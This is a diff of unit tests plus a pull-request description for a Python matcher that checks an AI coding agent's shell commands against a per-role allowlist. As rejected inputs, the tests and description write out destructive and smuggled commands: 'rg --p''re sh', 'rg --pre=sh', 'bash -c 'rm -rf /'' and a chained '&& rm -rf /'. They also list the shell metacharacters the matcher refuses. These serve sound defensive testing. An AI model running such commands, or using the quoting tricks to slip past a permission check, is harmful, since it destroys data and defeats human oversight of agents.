         "find . -name '*.tmp' -delete",
@@ -191,6 +200,15 @@ def test_rg_pre_is_blocked_for_bare_rg_entry():
     assert reason == "blocked_rg_flag"
 
 
+def test_quote_smuggled_rg_pre_is_blocked_for_bare_rg_entry():
+    allowed, reason = is_bash_command_allowed(
+        "rg --p''re sh TODO",
+        ["rg"],
+    )
+    assert allowed is False
+    assert reason == "blocked_rg_flag"
+
+
 def test_rg_pre_equals_form_is_blocked_for_bare_rg_entry():
     allowed, reason = is_bash_command_allowed(
         "rg --pre=sh TODO",
@@ -214,6 +232,12 @@ def test_exact_rg_pre_entry_is_allowed():
     allowed, reason = is_bash_command_allowed(command, [command])
     assert allowed is True
     assert reason == "exact_match"
+
+
+def test_invalid_shell_syntax_is_rejected():
+    allowed, reason = is_bash_command_allowed("rg 'unterminated", ["rg"])
+    assert allowed is False
+    assert reason == "invalid_shell_syntax"
 
 
 def test_pipeline_spot_checks_allow_expected_commands():


### PR DESCRIPTION
## Summary
Replaces the prefix-based bash matcher in `.claude/hooks/enforce-allowlist.sh` with a tokenized first-N algorithm that rejects shell metacharacters, and cleans every role's bash list in `.ai/allowlist.json` so role permissions no longer rely on bare `bash` / `python` / `python3` tokens.
- Ships allowlist content today even if the PreToolUse hook stays off — activation is tracked separately.
- Security-sensitive change. Dual-reviewed (Claude + Codex) through the full Quest pipeline.

## Changes
- **Security / Allowlist**:
  - Remove every bare `"bash"`, `"python"`, `"python3"` from all 7 roles' bash lists in `.ai/allowlist.json`; replace with explicit program+args entries (e.g. `bash scripts/quest_validate-manifest.sh`, `python3 -m pytest`).
  - Normalize all 5 occurrences of `"gh pr view.*"` to `"gh pr view"` so tokenized matching handles the wildcard correctly.
- **Matcher**:
  - New `scripts/quest_allowlist_matcher.py` exposing `is_bash_command_allowed(command, allowed_entries) -> (bool, reason)` with a three-layer algorithm: exact byte-for-byte allow → metacharacter reject (`&&`, `||`, `;`, `|`, `&`, backticks, `\$()`, `>(`, `<(`, `\n`, `\r`) → tokenized first-N match using `str.split()`.
  - Argv-driven CLI (`--command`, `--allow`) called from `.claude/hooks/enforce-allowlist.sh`'s rewritten `check_bash`.
- **Tests**:
  - `tests/unit/test_allowlist_matcher.py`: 25 cases covering the full metacharacter matrix, tokenization invariance, bare-token rejection, `bash -c 'rm -rf /'` and `python -c "..."` exploit rejection, and pipeline spot-checks.
  - `tests/integration/test-enforce-allowlist.sh`: end-to-end bash → Python bridge verification for one allowed and one rejected command.

## Validation
- [ ] **Unit matrix**: \`python3 -m pytest tests/unit/test_allowlist_matcher.py -v\` — 25 tests pass.
- [ ] **Full suite**: \`python3 -m pytest tests/\` — 387 tests pass.
- [ ] **Integration bridge**: \`bash tests/integration/test-enforce-allowlist.sh\` — allowed path exits 0, rejected path exits non-zero.
- [ ] **Manual spot-check**: \`./.claude/hooks/enforce-allowlist.sh Bash '{"command": "bash scripts/quest_validate-manifest.sh"}'\` exits 0; same hook with \`"command": "bash scripts/quest_validate-manifest.sh && rm -rf /"\` is rejected with a metacharacter reason.

Watch for: the PreToolUse hook is still not wired into \`.claude/settings.json\` — this PR ships content/logic only. Role-identification and hook activation are tracked in \`ideas/2026-04-20-allowlist-enforcement-activation.md\`.

## Notes
- Idea doc: \`ideas/2026-04-20-allowlist-pattern-hygiene.md\`.
- Deliberately out of scope: bare \`pytest\`, \`rg\`, \`find\`, \`ls\` carry-forward cleanup; PATH-hijack hardening; redirection (\`>\`, \`>>\`) gating. Each is tracked for follow-up.

<pre>
     ▐▛███▜▌
    ▝▜█████▛▘
      ▘▘ ▝▝
Quest/Co-Authored by
Co-Authored-By: Codex <noreply@openai.com>
Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
in collaboration with KjellKod <kjell.hedstrom@gmail.com>
</pre>